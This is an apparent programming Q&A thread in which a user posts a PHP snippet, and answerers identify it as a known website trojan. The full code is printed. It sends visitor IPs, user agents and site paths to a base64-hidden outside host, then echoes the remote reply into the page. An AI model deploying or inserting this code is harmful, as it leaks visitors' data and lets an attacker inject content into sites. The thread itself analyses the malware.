# GET parameters not displayed

Tags: php

I came across this script that is apparently famous as far as 2010.
I want to test it and understand its function.

I created a file in which I `echo` all the parameters of IP: but no one of them is visible !

My question is why ?
And what does this script do after all ?

P.S. I googled about it, but I did not find any real and convincing explanation of what this code does.

```
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Seek for the type of the browser that requested the page by checking the header of User_Agent
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>
```

Comment: What is this script supposed to do? What do you want do achieve?

Comment: @ZarkDev: that is the question I asked because this script is not mine,  I found it on internet.

Comment: But you found it in which purpose? To use on one of yout projects?

Comment: Nothing you have described here feels legit. Please see http://ninjafirewall.com/malware/index.php?threat=2012-09-05.01 - Please clearly state your intentions.

Comment: Both of these discuss the exact code you posted: http://stackoverflow.com/questions/16391443/trojan-code-embeded-in-my-website-pages-what-is-the-meaning-of-this-code?rq=1 AND http://stackoverflow.com/questions/16264707/opencart-ajax-json-response-unknown-characters

Answer (score 1, accepted):

The code looks to be part of some malware that posts data to the URL [link](http://pubbotstatistic.com/statC/stat.php), which is base64 encoded in that script.

I'd say it's to notify the creator of the malware of where the script has managed to be installed.

Comment: Thank you for the explanation. But why when I create a file to diplay the parameter IP sent to a file (stat.php) I can not see it displayed ?

Comment: It's hard to answer that as the script relies on curl being actively available for use, and I don't know what you have in your stat.php. If you want to see whats being sent, just echo out $stCurlLink in the above script, as the data is appended to the url.

Comment: this is the content of my stat.php file: <?php
    if(isset($_GET['ip'])){
    //echo urldecode($_GET['ip']).'<br/>';
    echo urldecode($_GET['useragent']).'<br/>';
    echo urldecode($_GET['domainhame']).'<br/>';
    //echo urldecode($_GET['fullpath']).'<br/>';
    //echo urldecode($_GET['check']).'<br/>';
 echo"hello";
    }else{
  echo"I do not understand why IP is unset !";
 }
?>

Comment: What is it exactly you're trying to achieve, unless you're trying to learn to write malware, it's hardly quality "good practise" PHP code if you're trying to learn the language. The vars it's sending are to stat.php are simply the ip, domain, url, useragent etc - just echo out $stCurlLink like I said and you will see what is being sent.

Comment: I did what you asked : "echo $stCurlLink;" but it is never displayed. No echo works after the base64_decode(...)

Comment: Then it's probably not reaching that block of code.

Comment: The echo works just before this line @$stCurlHandle = curl_init( $stCurlLink ); but after it, it is impossible to get those parameters (for example within a stat.php file within the same directory)

Comment: Why nothing is displayed after this line : @$stCurlHandle = curl_init( $stCurlLink ); ?

Comment: Because your script is halting at the curl_init command. Also the @ in front of a function call will suppress output. What exactly are you trying to create, because as I said this is not clean, quality code and not something I'd recommend to learn from, and if you're trying to create working malware then my assistance stops here.

Comment: I am not asking help to develop a virus.

Comment: How can i save those parameters within the file stat.php ? As I said, this is a famous script, not a virus programmed by myself